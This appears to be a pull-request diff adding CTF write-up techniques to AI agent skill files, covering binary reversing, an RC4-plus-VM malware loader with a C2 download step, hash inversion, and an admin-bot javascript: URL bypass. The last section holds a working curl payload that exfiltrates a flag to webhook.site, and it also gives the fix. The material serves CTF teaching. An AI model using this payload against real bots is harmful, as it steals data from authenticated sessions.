+**Attack:**
+1. Reverse the core check function to identify rendering and comparison logic
+2. Find the expected pixel blob in `.rdata` (look for large data block referenced near comparison)
+3. XOR with constant (e.g., 0xAA) to recover expected rendered DIB
+4. Save as image and OCR to recover flag text
+
+```python
+import numpy as np
+from PIL import Image
+
+with open("binary.exe", "rb") as f:
+    data = f.read()
+
+# Extract from .rdata section (offsets from reversing)
+blob_offset = 0xC3620  # .rdata offset to XOR'd blob
+blob_size = 0x15F90     # 450 * 50 * 4 (BGRA)
+blob = np.frombuffer(data[blob_offset:blob_offset + blob_size], dtype=np.uint8)
+expected = blob ^ 0xAA  # XOR with constant key
+
+# Reshape as BGRA image (dimensions from reversing)
+img = expected.reshape(50, 450, 4)
+channel = img[:, :, 0]  # Take one channel (grayscale text)
+Image.fromarray(channel, "L").save("target.png")
+
+# OCR with charset whitelist
+import subprocess
+result = subprocess.run(
+    ["tesseract", "target.png", "stdout", "-c",
+     "tessedit_char_whitelist=abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_"],
+    capture_output=True, text=True)
+print(result.stdout)
+```
+
+**Key insight:** When a binary renders text and compares pixels, the expected pixel data is the flag rendered as an image. Extract it directly from the binary data section without needing to understand the rendering logic. OCR with charset whitelist improves accuracy for CTF flag characters.
+
+---
+
+## Two-Stage Loader: RC4 Gate + VM Constraints (srdnlenCTF 2026)
+
+**Pattern (Cornflake v3.5):** Two-stage malware loader — stage 1 uses RC4 username gate, stage 2 downloaded from C2 contains VM-based password validation.
+
+**Stage 1 — RC4 username recovery:**
+```python
+def rc4(key, data):
+    s = list(range(256))
+    j = 0
+    for i in range(256):
+        j = (j + s[i] + key[i % len(key)]) & 0xFF
+        s[i], s[j] = s[j], s[i]
+    i = j = 0
+    out = bytearray()
+    for b in data:
+        i = (i + 1) & 0xFF
+        j = (j + s[i]) & 0xFF
+        s[i], s[j] = s[j], s[i]
+        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
+    return bytes(out)
+
+# Key from binary strings, ciphertext from stored hex
+username = rc4(b"s3cr3t_k3y_v1", bytes.fromhex("46f5289437bc009c17817e997ae82bfbd065545d"))
+```
+
+**Stage 2 — VM constraint extraction:**
+1. Download stage 2 from C2 endpoint (e.g., `/updates/check.php`)
+2. Reverse VM bytecode interpreter (typically 15-20 opcodes)
+3. Extract linear equality constraints over flag characters
+4. Solve constraint system (Z3 or manual)
+
+**Key insight:** Multi-stage loaders often use simple crypto (RC4) for the first gate and more complex validation (custom VM) for the second. The VM memory may be uninitialized (all zeros), drastically simplifying constraint extraction since memory-dependent operations become constants.
+
+---
+
+## GBA ROM VM Hash Inversion via Meet-in-the-Middle (srdnlenCTF 2026)
+
+**Pattern (Dante's Trial):** Game Boy Advance ROM implements a custom VM. Hash function uses FNV-1a variant with uninitialized memory (stays all zeros). Meet-in-the-middle attack splits the search space.
+
+**Hash function structure:**
+```python
+# FNV-1a variant with XOR/multiply
+P = 0x100000001b3        # FNV prime
+CUP = 0x9e3779b185ebca87  # Golden ratio constant
+MASK64 = (1 << 64) - 1
+
+def fmix64(h):
+    """Finalization mixer."""
+    h ^= h >> 33; h = (h * 0xff51afd7ed558ccd) & MASK64
+    h ^= h >> 33; h = (h * 0xc4ceb9fe1a85ec53) & MASK64
+    h ^= h >> 33
+    return h
+
+def hash_input(chars, seed_lo=0x84222325, seed_hi=0xcbf29ce4):
+    hlo, hhi, ptr = seed_lo, seed_hi, 0
+    for c in chars:
+        # tri_mix(c, mem[ptr]) — mem is always 0
+        delta = ((ord(c) * CUP) ^ (0 * P)) & MASK64
+        hlo = ((hlo ^ (delta & 0xFFFFFFFF)) * (P & 0xFFFFFFFF)) & 0xFFFFFFFF
+        hhi = ((hhi ^ (delta >> 32)) * (P >> 32)) & 0xFFFFFFFF
+        ptr = (ptr + 1) & 0xFF
+    combined = ((hhi << 32) | (hlo ^ ptr)) & MASK64
+    return fmix64((combined * P) & MASK64)
+```
+
+**Meet-in-the-middle attack:**
+```python
+import string
+
+TARGET = 0x73f3ebcbd9b4cd93
+LENGTH = 6
+SPLIT = 3
+charset = [c for c in string.printable if 32 <= ord(c) < 127]
+
+# Forward pass: enumerate first 3 characters from seed state
+forward = {}
+for c1 in charset:
+    for c2 in charset:
+        for c3 in charset:
+            state = hash_forward(seed, [c1, c2, c3])
+            forward[state] = c1 + c2 + c3
+
+# Backward pass: invert fmix64 and final multiply, enumerate last 3 chars
+inv_target = invert_fmix64(TARGET)
+for c4 in charset:
+    for c5 in charset:
+        for c6 in charset:
+            state = hash_backward(inv_target, [c4, c5, c6])
+            if state in forward:
+                print(f"Found: {forward[state]}{c4}{c5}{c6}")
+```
+
+**Key insight:** Meet-in-the-middle reduces search from `95^6 ≈ 7.4×10^11` to `2×95^3 ≈ 1.7×10^6` — a factor of ~430,000x speedup. Critical when the hash function is invertible from the output side (i.e., `fmix64` and the final multiply can be undone). Also: uninitialized VM memory that stays zero simplifies the hash function by removing a variable.
 
 ---
 

--- a/ctf-web/SKILL.md
+++ b/ctf-web/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-web
-description: Web exploitation techniques for CTF challenges. Use when solving web security challenges involving XSS, SQLi, SSTI, SSRF, CSRF, XXE, file upload bypasses, JWT attacks, prototype pollution, path traversal, command injection, request smuggling, DOM clobbering, Web3/blockchain, or authentication bypass.
+description: Provides web exploitation techniques for CTF challenges. Use when solving web security challenges involving XSS, SQLi, SSTI, SSRF, CSRF, XXE, file upload bypasses, JWT attacks, prototype pollution, path traversal, command injection, request smuggling, DOM clobbering, Web3/blockchain, or authentication bypass.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-web/SKILL.md
+++ b/ctf-web/SKILL.md
@@ -247,6 +247,10 @@ Linear XOR-based signing with secret blocks → recover from known pairs → for
 
 Content behind CSS overlay (`position: fixed; z-index: 99999`) is still in the raw HTML. `curl` or view-source bypasses it instantly. See [client-side.md](client-side.md#cssjs-paywall-bypass).
 
+## Admin Bot javascript: URL Scheme Bypass
+
+`new URL()` validates syntax only, not protocol — `javascript:` URLs pass and execute in Puppeteer's authenticated context. CSP/SRI on the target page are irrelevant since JS runs in navigation context. See [client-side.md](client-side.md#admin-bot-javascript-url-scheme-bypass-dicectf-2026).
+
 ## Common Flag Locations
 
 ```

--- a/ctf-web/client-side.md
+++ b/ctf-web/client-side.md
@@ -20,6 +20,7 @@
 - [CSS/JS Paywall Bypass](#cssjs-paywall-bypass)
 - [JPEG+HTML Polyglot XSS (EHAX 2026)](#jpeghtml-polyglot-xss-ehax-2026)
 - [JSFuck Decoding](#jsfuck-decoding)
+- [Admin Bot javascript: URL Scheme Bypass (DiceCTF 2026)](#admin-bot-javascript-url-scheme-bypass-dicectf-2026)
 
 ---
 
@@ -294,3 +295,46 @@ const code = fs.readFileSync('jsfuck.js', 'utf8');
 const func = eval(code.slice(0, -2));
 console.log(func.toString());  // Reveals original code with hardcoded flag
 ```
+
+---
+
+## Admin Bot javascript: URL Scheme Bypass (DiceCTF 2026)
+
+**Pattern (Mirror Temple):** Admin bot navigates to user-supplied URL, validates with `new URL()` which only checks syntax — not protocol scheme. `javascript:` URLs pass validation and execute arbitrary JS in the bot's authenticated context.
+
+**Vulnerable validation:**
+```javascript
+try {
+  new URL(targetUrl)   // Accepts javascript:, data:, file:, etc.
+} catch {
+  process.exit(1)
+}
+await page.goto(targetUrl, { waitUntil: "domcontentloaded" })
+```
+
+**Exploit:**
+```bash
+# 1. Create authenticated session (bot requires valid cookie)
+curl -i -X POST 'https://target/postcard-from-nyc' \
+  --data-urlencode 'name=test' \
+  --data-urlencode 'flag=dice{test}' \
+  --data-urlencode 'portrait='
+# Extract save=... cookie from Set-Cookie header
+
+# 2. Submit javascript: URL to report endpoint
+curl -X POST 'https://target/report' \
+  -H 'Cookie: save=YOUR_COOKIE' \
+  --data-urlencode "url=javascript:fetch('/flag').then(r=>r.text()).then(f=>location='https://webhook.site/ID/?flag='+encodeURIComponent(f))"
+```
+
+**Why CSP/SRI don't help (B-Side variant):** The B-Side adds inlined CSS, SRI integrity hashes on scripts, and strict CSP. None of these matter because `javascript:` URLs execute in a **navigation context** — the bot navigates to the JS URL directly, not injecting into an existing page. The CSP of the target page is irrelevant since the JS runs before any page loads.
+
+**Fix:**
+```javascript
+const u = new URL(targetUrl)
+if (!['http:', 'https:'].includes(u.protocol)) {
+  process.exit(1)
+}
+```
+
+**Key insight:** `new URL()` is a **syntax** validator, not a **security** validator. It accepts `javascript:`, `data:`, `file:`, `blob:`, and other dangerous schemes. Any admin bot or SSRF handler using `new URL()` alone for validation is vulnerable. Always allowlist protocols explicitly.

--- a/solve-challenge/SKILL.md
+++ b/solve-challenge/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: solve-challenge
-description: Solve CTF challenges by analyzing files, connecting to services, and applying exploitation techniques. Orchestrates category-specific CTF skills for pwn, crypto, web, reverse engineering, forensics, OSINT, malware analysis, and miscellaneous challenges.
+description: Solves CTF challenges by analyzing files, connecting to services, and applying exploitation techniques. Orchestrates category-specific CTF skills for pwn, crypto, web, reverse engineering, forensics, OSINT, malware analysis, and miscellaneous challenges.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access. Orchestrates other ctf-* skills.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch Skill


### PR DESCRIPTION
## Summary

- **Add techniques from srdnlenCTF 2026 writeup**: 571 lines of new content across 6 files covering Ascon-like differential cryptanalysis, garbled circuits AES key recovery, MAYO fault injection, FROST threshold signatures, WordPerfect macro XOR extraction, minidump ISO 9660 recovery, APFS snapshot analysis, stack variable overlap, bytecode validator bypass, Verilog hardware RE, Windows PE XOR bitmap OCR, two-stage RC4+VM loaders, and GBA ROM meet-in-the-middle hash inversion
- **Fix SKILL.md descriptions for Agent Skills spec compliance**: All 9 descriptions updated from noun phrases to third-person verb form ("Provides..." / "Solves...") as required by the spec

## Test plan

- [ ] Verify all SKILL.md files parse valid YAML frontmatter
- [ ] Verify descriptions start with third-person verbs
- [ ] Verify sub-file ToC links resolve correctly
- [ ] Spot-check new technique sections for accuracy